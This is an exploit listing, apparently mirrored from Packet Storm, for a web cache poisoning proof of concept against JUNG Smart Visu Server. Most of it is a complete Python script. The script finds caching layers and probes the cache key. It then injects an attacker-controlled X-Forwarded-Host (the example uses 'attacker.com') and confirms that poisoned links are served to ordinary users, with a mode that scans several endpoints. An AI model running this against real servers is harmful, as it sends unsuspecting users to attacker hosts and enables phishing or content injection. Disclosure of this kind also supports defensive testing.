Lucene search
K

📄 JUNG Smart Visu Server Cache Poisoning

🗓️ 16 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 134 Views

PoC detects and validates cache poisoning in JUNG Smart Visu Server using headers and X Forwarded Host with recheck.

Code
=============================================================================================================================================
    | # Title     : JUNG Smart Visu Server - Advanced Cache Poisoning Exploit                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.jung-group.com/en-DE                                                                                            |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/215522/  & 	ZSL-2026-5970
    
    [+] Summary    : This Python script is a PoC designed to detect and validate a web cache poisoning vulnerability in JUNG Smart Visu Server.
    
    The tool performs a structured and reliable validation process instead of relying on simple reflection checks. It:
    
    Detects the presence of a caching layer (CDN, proxy, reverse proxy)
    
    Analyzes cache-related HTTP headers (e.g., Age, X-Cache, CF-Cache-Status)
    
    Determines whether query strings or specific headers affect the cache key
    
    Attempts cache poisoning using the X-Forwarded-Host header
    
    Verifies the vulnerability by issuing a second normal request to confirm cache persistence
    
    Collects evidence such as poisoned responses and affected links
    
    If successful, the script confirms that malicious input can be stored in cache and served to normal users, demonstrating a confirmed cache poisoning condition.
    
    The PoC supports both single-endpoint testing and comprehensive multi-endpoint scanning modes.
    
    [+] POC :
    
    #!/usr/bin/env python3
    
    import requests
    import sys
    import time
    import hashlib
    import urllib3
    from urllib.parse import urlparse, parse_qs
    from typing import Dict, List, Optional, Tuple
    import json
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class JUNGCachePoisoningExploit:
        def __init__(self, target_url: str, malicious_host: str, verbose: bool = True):
            self.target_url = target_url.rstrip('/')
            self.malicious_host = malicious_host
            self.verbose = verbose
            self.session = requests.Session()
            self.session.verify = False
            self.session.timeout = 10
            self.cache_headers = [
                'Cache-Control', 'Age', 'X-Cache', 'X-Cache-Lookup',
                'CF-Cache-Status', 'X-Varnish', 'Via', 'X-Proxy-Cache',
                'X-Cache-Status', 'Server-Timing', 'X-Drupal-Cache',
                'X-Nginx-Cache', 'X-Accel-Expires'
            ]
            
        def log(self, message: str, level: str = "INFO"):
            """Logging with colors"""
            colors = {
                "INFO": "\033[94m[*]\033[0m",
                "SUCCESS": "\033[92m[+]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "VULN": "\033[91m[OK]\033[0m"
            }
            if self.verbose or level in ["ERROR", "VULN", "WARNING"]:
                print(f"{colors.get(level, '[*]')} {message}")
        
        def analyze_cache_headers(self, headers: Dict) -> Dict:
            """Analyze cache-related headers"""
            cache_info = {
                'is_cached': False,
                'cache_headers': {},
                'cache_control': {},
                'age': None,
                'cache_hit': False
            }
    
            for header in self.cache_headers:
                if header.lower() in {h.lower() for h in headers}:
                    actual_header = next(h for h in headers if h.lower() == header.lower())
                    cache_info['cache_headers'][actual_header] = headers[actual_header]
    
            if 'Cache-Control' in headers:
                cache_directives = headers['Cache-Control'].split(',')
                for directive in cache_directives:
                    d = directive.strip().lower()
                    if '=' in d:
                        key, value = d.split('=', 1)
                        cache_info['cache_control'][key] = value
                    else:
                        cache_info['cache_control'][d] = True
    
            if 'Age' in headers:
                try:
                    cache_info['age'] = int(headers['Age'])
                    cache_info['is_cached'] = True
                    cache_info['cache_hit'] = cache_info['age'] > 0
                except:
                    pass
            for header in ['X-Cache', 'X-Cache-Lookup', 'CF-Cache-Status']:
                if header in headers:
                    value = headers[header].lower()
                    if 'hit' in value:
                        cache_info['cache_hit'] = True
                        cache_info['is_cached'] = True
                    cache_info['cache_headers'][header] = headers[header]
            
            return cache_info
        
        def detect_caching_layer(self) -> Dict:
            """Detect if there's a caching layer (proxy, CDN, etc.)"""
            cache_layer = {
                'has_cache': False,
                'cache_type': None,
                'cache_details': {}
            }
    
            test_param = f"test_{int(time.time())}"
            url = f"{self.target_url}/rest/items?{test_param}=1"
            
            try:
    
                response1 = self.session.get(url)
                cache1 = self.analyze_cache_headers(response1.headers)
    
                time.sleep(0.5)
                response2 = self.session.get(url)
                cache2 = self.analyze_cache_headers(response2.headers)
    
                if cache2.get('cache_hit') or (cache2.get('age') and cache2['age'] > 0):
                    cache_layer['has_cache'] = True
                    cache_layer['cache_details']['first_request'] = cache1
                    cache_layer['cache_details']['second_request'] = cache2
    
                    if 'X-Cache' in response2.headers:
                        cache_layer['cache_type'] = 'Generic Proxy Cache'
                    if 'CF-Cache-Status' in response2.headers:
                        cache_layer['cache_type'] = 'CloudFlare CDN'
                    if 'X-Varnish' in response2.headers:
                        cache_layer['cache_type'] = 'Varnish Cache'
                    if 'Via' in response2.headers and 'nginx' in response2.headers.get('Via', '').lower():
                        cache_layer['cache_type'] = 'Nginx Proxy'
                        
                    self.log(f"Detected caching layer: {cache_layer['cache_type'] or 'Unknown'}", "SUCCESS")
                else:
                    self.log("No caching layer detected", "WARNING")
                    
            except Exception as e:
                self.log(f"Error detecting cache: {str(e)}", "ERROR")
                
            return cache_layer
        
        def test_cache_key_variations(self, endpoint: str) -> Dict:
            """Test what variations affect the cache key"""
            cache_key_info = {
                'query_string_matters': False,
                'headers_matter': {},
                'vary_headers': []
            }
            
            base_url = f"{self.target_url}{endpoint}"
            test_payload = f"test_{hash(time.time())}"
            
            try:
                url1 = f"{base_url}?test1={test_payload}"
                url2 = f"{base_url}?test2={test_payload}"
                
                response1 = self.session.get(url1)
                response2 = self.session.get(url2)
    
                if hashlib.md5(response1.content).digest() != hashlib.md5(response2.content).digest():
                    cache_key_info['query_string_matters'] = True
    
                if 'Vary' in response1.headers:
                    vary_headers = [h.strip() for h in response1.headers['Vary'].split(',')]
                    cache_key_info['vary_headers'] = vary_headers
    
                    for vary_header in vary_headers:
                        if vary_header.lower() in ['cookie', 'authorization', 'user-agent']:
    
                            headers1 = {vary_header: 'test1'}
                            headers2 = {vary_header: 'test2'}
                            
                            resp1 = self.session.get(url1, headers=headers1)
                            resp2 = self.session.get(url1, headers=headers2)
                            
                            if hashlib.md5(resp1.content).digest() != hashlib.md5(resp2.content).digest():
                                cache_key_info['headers_matter'][vary_header] = True
                                
            except Exception as e:
                self.log(f"Error testing cache key: {str(e)}", "ERROR")
                
            return cache_key_info
        
        def attempt_cache_poisoning(self, endpoint: str = "/rest/items") -> Tuple[bool, Dict]:
            """
            Attempt to poison the cache and verify with a second request
            """
            self.log(f"\n[*] Attempting cache poisoning on {endpoint}")
    
            cache_layer = self.detect_caching_layer()
            if not cache_layer['has_cache']:
                self.log("No cache detected, cannot perform cache poisoning", "WARNING")
                return False, {'error': 'no_cache'}
    
            cache_key_info = self.test_cache_key_variations(endpoint)
            self.log(f"Query string affects cache key: {cache_key_info['query_string_matters']}")
            poison_param = "poison_test"
            if cache_key_info['query_string_matters']:
                poison_url = f"{self.target_url}{endpoint}?{poison_param}=1"
            else:
                poison_url = f"{self.target_url}{endpoint}"
    
            headers = {
                "User-Agent": "Mozilla/5.0 (Poisoning-Test)",
                "X-Forwarded-Host": self.malicious_host,
                "Accept": "application/json",
                "Cache-Control": "no-cache"  
            }
            
            self.log(f"Sending poisoned request with X-Forwarded-Host: {self.malicious_host}")
            poison_response = self.session.get(poison_url, headers=headers)
    
            if self.malicious_host not in poison_response.text:
                self.log("Malicious host not reflected in response", "ERROR")
                return False, {'error': 'no_reflection'}
            
            self.log("Malicious host reflected in response", "SUCCESS")
    
            self.log("\n[*] Verifying cache poisoning with second request...")
            time.sleep(1)  
    
            verify_headers = {
                "User-Agent": "Mozilla/5.0 (Normal-User)",
                "Accept": "application/json"
            }
            
            verify_response = self.session.get(poison_url, headers=verify_headers)
    
            if self.malicious_host in verify_response.text:
                self.log("CACHE POISONING CONFIRMED!", "VULN")
                self.log(f"Malicious host '{self.malicious_host}' served to normal user", "VULN")
    
                cache_info = self.analyze_cache_headers(verify_response.headers)
                if cache_info['cache_hit']:
                    self.log("Response came from cache (cache hit)", "SUCCESS")
    
                evidence = {
                    'poisoned_url': poison_url,
                    'malicious_host': self.malicious_host,
                    'cache_layer': cache_layer,
                    'cache_headers': cache_info,
                    'poisoned_response_sample': poison_response.text[:500] + "...",
                    'verified_response_sample': verify_response.text[:500] + "..."
                }
    
                try:
                    data = verify_response.json()
                    if isinstance(data, list):
                        poisoned_links = [item.get('link') for item in data if 'link' in item and self.malicious_host in item.get('link', '')]
                        evidence['poisoned_links'] = poisoned_links[:5]
                except:
                    pass
                
                return True, evidence
            else:
                self.log("Cache poisoning failed - normal request doesn't show malicious host", "WARNING")
    
                self.log("Checking cache headers of normal request:")
                cache_info = self.analyze_cache_headers(verify_response.headers)
                for header, value in cache_info['cache_headers'].items():
                    self.log(f"  {header}: {value}")
                    
                return False, {'error': 'poisoning_failed'}
        
        def comprehensive_scan(self):
            """Scan multiple endpoints for cache poisoning vulnerability"""
            self.log("\n" + "="*60)
            self.log("Starting comprehensive cache poisoning scan", "INFO")
            self.log("="*60)
            
            endpoints = [
                "/rest/items",
                "/rest/ui",
                "/rest/configuration",
                "/rest/devices",
                "/",
                "/api/v1/items"
            ]
            
            vulnerable_endpoints = []
            
            for endpoint in endpoints:
                self.log(f"\n[*] Testing endpoint: {endpoint}")
                success, result = self.attempt_cache_poisoning(endpoint)
                
                if success:
                    vulnerable_endpoints.append({
                        'endpoint': endpoint,
                        'evidence': result
                    })
                    if 'poisoned_links' in result:
                        self.log("\nPoisoned links detected:", "VULN")
                        for link in result['poisoned_links']:
                            self.log(f"   {link}", "VULN")
                
                time.sleep(2)  
            
            return vulnerable_endpoints
    
    def main():
        """Main function"""
        if len(sys.argv) < 3:
            print("Usage: python3 exploit_advanced.py <target_url> <malicious_host>")
            print("Example: python3 exploit_advanced.py http://10.0.0.16:8080 attacker.com")
            print("Options:")
            print("  --scan        Perform comprehensive scan of all endpoints")
            print("  --endpoint    Specify custom endpoint")
            sys.exit(1)
        
        target = sys.argv[1]
        malicious = sys.argv[2]
        
        exploit = JUNGCachePoisoningExploit(target, malicious, verbose=True)
        
        if "--scan" in sys.argv:
            results = exploit.comprehensive_scan()
            
            print("\n" + "="*60)
            print("SCAN RESULTS")
            print("="*60)
            
            if results:
                print(f"\nFound {len(results)} vulnerable endpoints:")
                for r in results:
                    print(f"  - {r['endpoint']}")
                    if 'poisoned_links' in r['evidence']:
                        print(f"    Sample poisoned links:")
                        for link in r['evidence']['poisoned_links'][:3]:
                            print(f"      {link}")
            else:
                print("\nNo vulnerable endpoints found (or cache poisoning not confirmed)")
                
        else:
            endpoint = "/rest/items"
            for i, arg in enumerate(sys.argv):
                if arg == "--endpoint" and i+1 < len(sys.argv):
                    endpoint = sys.argv[i+1]
            
            success, evidence = exploit.attempt_cache_poisoning(endpoint)
            
            if success:
                print("\n" + "="*60)
                print("VULNERABLE TO CACHE POISONING")
                print("="*60)
                print(f"Target: {target}")
                print(f"Endpoint: {endpoint}")
                print(f"Malicious host: {malicious}")
                
                if 'poisoned_links' in evidence:
                    print("\nPoisoned links detected:")
                    for link in evidence['poisoned_links']:
                        print(f"  {link}")
                
                print("\n[!]  Recommendations:")
                print("    - Update JUNG Smart Visu Server")
                print("    - Validate/sanitize X-Forwarded-Host header")
                print("    - Configure proxy to strip or validate proxy headers")
                print("    - Implement host header whitelisting")
            else:
                print("\n Target not vulnerable to confirmed cache poisoning")
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
134